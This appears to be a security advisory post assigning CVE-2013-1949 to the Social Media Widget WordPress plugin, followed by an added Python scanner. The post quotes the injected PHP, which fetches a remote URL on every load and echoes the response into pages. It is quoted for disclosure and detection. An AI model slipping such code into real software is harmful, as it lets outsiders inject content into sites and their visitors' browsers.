http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
http://securityledger.com/hacked-wordpress-plug-in-put-on-double-secret-probation/
http://it.slashdot.org/story/13/04/13/212226/popular-wordpress-plug-in-caught-spamming-is-put-on-probation

So the company responsible for Social Media Widget claims that a rogue developer they contracted inserted this code:

$smw_url = "hxxp://i.aaur.net/i.php";   // remote URL the plugin will fetch on every request (defanged)
if(!function_exists("smw_get")){
    function smw_get($f) {
        // first try the WordPress HTTP API
        $response = wp_remote_get( $f );
        if( is_wp_error( $response ) ) {
            // fall back to raw curl if the WP HTTP API fails; errors are silenced with @
            function smw_get_body($f) {
                $ch = @curl_init();
                @curl_setopt($ch, CURLOPT_URL, $f);
                @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $output = @curl_exec($ch);
                @curl_close($ch);
                return $output;
            }
            echo smw_get_body($f);      // remote response body goes straight into the page output
        } else {
            echo $response["body"];     // same, via the WP HTTP API response
        }
    }
    smw_get($smw_url);                  // runs whenever the plugin file is loaded
}

Regardless of HOW this code got into the plugin, it represents a significant security issue. Any site using this plugin is pulling "hxxp://i.aaur.net/i.php" and including it in the page it generates and sends to a user. This opens up a huge can of worms: anyone that can man-in-the-middle your server can now inject PHP into your blog, or anything sent to the clients, etc.

Please use CVE-2013-1949 for this issue.
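As an added example (not part of the original post, and not the plugin's own code), here is a small line-based Python scanner for the pattern described above: a hard-coded remote URL plus an echo/print of a fetched response body, with simple taint tracking through variables and helper functions. SAMPLE is a constructed copy of the snippet quoted in the post and CLEAN is a constructed benign snippet; the fetch function names and the finding kinds are this example's own choices. It is a heuristic, not a PHP parser, so obfuscated or dynamically built code will evade it.

```python
"""Heuristic scanner for 'fetch a remote URL and echo the body' in PHP plugin
source.  Added example; not code from the oss-security post or the plugin."""
from __future__ import annotations
import re

# Calls whose return value is (or wraps) a remote response body (assumed list).
FETCH_CALLS = {"wp_remote_get", "wp_remote_post", "wp_remote_request",
               "wp_remote_retrieve_body", "curl_exec", "file_get_contents"}

ASSIGN_RE = re.compile(r'(\$\w+)\s*=\s*@?(\w+)\s*\(')         # $var = [@]call(
FUNC_RE = re.compile(r'\bfunction\s+(\w+)\s*\(')               # function name(
RETURN_RE = re.compile(r'\breturn\s+(\$\w+)')                  # return $var
ECHO_RE = re.compile(r'\b(?:echo|print)\b\s*(.+?);')           # echo <expr>;
URL_RE = re.compile(r'["\'](?:hxxp|http)s?://[^"\']+["\']', re.IGNORECASE)
VAR_RE = re.compile(r'\$\w+')
CALL_RE = re.compile(r'\b(\w+)\s*\(')


def scan_php(source: str) -> list[dict]:
    """Return findings for hard-coded remote URLs and for echo/print statements
    whose argument is, directly or via a helper function, a remote response body."""
    findings = []
    tainted_vars: set[str] = set()   # variables assigned from a fetch call
    tainted_funcs: set[str] = set()  # functions that return a tainted variable
    current_func = None              # most recently opened function definition

    for lineno, line in enumerate(source.splitlines(), 1):
        if (m := URL_RE.search(line)):
            findings.append({"line": lineno, "kind": "remote-url-literal",
                             "detail": m.group(0)})
        if (m := FUNC_RE.search(line)):
            current_func = m.group(1)
        if (m := ASSIGN_RE.search(line)):
            var, call = m.group(1), m.group(2)
            if call in FETCH_CALLS or call in tainted_funcs:
                tainted_vars.add(var)
        if (m := RETURN_RE.search(line)) and m.group(1) in tainted_vars and current_func:
            tainted_funcs.add(current_func)
        if (m := ECHO_RE.search(line)):
            expr = m.group(1)
            used_vars = set(VAR_RE.findall(expr)) & tainted_vars
            used_funcs = set(CALL_RE.findall(expr)) & (tainted_funcs | FETCH_CALLS)
            if used_vars or used_funcs:
                findings.append({"line": lineno, "kind": "remote-body-echo",
                                 "detail": expr.strip()})
    return findings


# Constructed copy of the snippet quoted in the post (URL kept defanged).
SAMPLE = '''<?php
$smw_url = "hxxp://i.aaur.net/i.php";
if(!function_exists("smw_get")){
    function smw_get($f) {
        $response = wp_remote_get( $f );
        if( is_wp_error( $response ) ) {
            function smw_get_body($f) {
                $ch = @curl_init();
                @curl_setopt($ch, CURLOPT_URL, $f);
                @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                $output = @curl_exec($ch);
                @curl_close($ch);
                return $output;
            }
            echo smw_get_body($f);
        } else {
            echo $response["body"];
        }
    }
    smw_get($smw_url);
}
'''

# Constructed benign snippet: echoes a local option, nothing fetched remotely.
CLEAN = '''<?php
function smw_title() {
    $title = get_option("smw_title");
    echo esc_html($title);
}
'''

if __name__ == "__main__":
    for f in scan_php(SAMPLE):
        print(f"line {f['line']:>3}  {f['kind']:<18} {f['detail']}")
    print("clean sample findings:", scan_php(CLEAN))
```

Run against SAMPLE it reports the hard-coded URL on line 2 and the two echo sites (the curl fallback via `smw_get_body` and the `$response["body"]` branch); CLEAN produces no findings. A real review would pair this with a diff of the plugin against the version published in the WordPress.org repository, since the scanner only points at places worth reading.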